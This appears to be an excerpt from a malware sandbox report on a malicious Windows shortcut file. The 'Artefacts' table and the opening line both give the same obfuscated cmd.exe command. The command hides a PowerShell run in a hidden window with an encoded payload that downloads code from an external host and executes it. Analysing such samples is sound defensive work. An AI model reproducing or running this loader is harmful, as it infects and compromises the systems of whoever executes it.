cmd.exe /WMRX:F0E /WFXI:BNYE5S /D/C "for %b in (xe) do for %t in (-w) do for %H in ("EAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAG8AcgB2AGUAdABlAG") do for %Y in (pow) do for %K in (-e) do for %l in ("QBkADQAZQA5ADEAYQAwAGYANAAzADQAYgBhADIAMQBhADMANQBkADIAZgA0ADYAZQA4ADgAZAA1ACcAKQA=") do for %N in (.e) do for %n in (hid) do for %v in (nc) do for %Z in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgB") do for %g in (ers) do for %p in ("4AbwBwAG8AdABlAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBzAHQAYQByAHQAdQBwAC8AMABhADgAZ") do for %V in (hell) do %Y%g%V%N%b %t %n %K%v %~Z%~H%~p%~l"
No malware configuration were found at this point.
Artefacts
Name
Value
Location
LNK: Command Execution
cmd.exe /WMRX:F0E /WFXI:BNYE5S /D/C "for %b in (xe) do for %t in (-w) do for %H in ("EAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAG8AcgB2AGUAdABlAG") do for %Y in (pow) do for %K in (-e) do for %l in ("QBkADQAZQA5ADEAYQAwAGYANAAzADQAYgBhADIAMQBhADMANQBkADIAZgA0ADYAZQA4ADgAZAA1ACcAKQA=") do for %N in (.e) do for %n in (hid) do for %v in (nc) do for %Z in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgB") do for %g in (ers) do for %p in ("4AbwBwAG8AdABlAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBzAHQAYQByAHQAdQBwAC8AMABhADgAZ") do for %V in (hell) do %Y%g%V%N%b %t %n %K%v %~Z%~H%~p%~l"
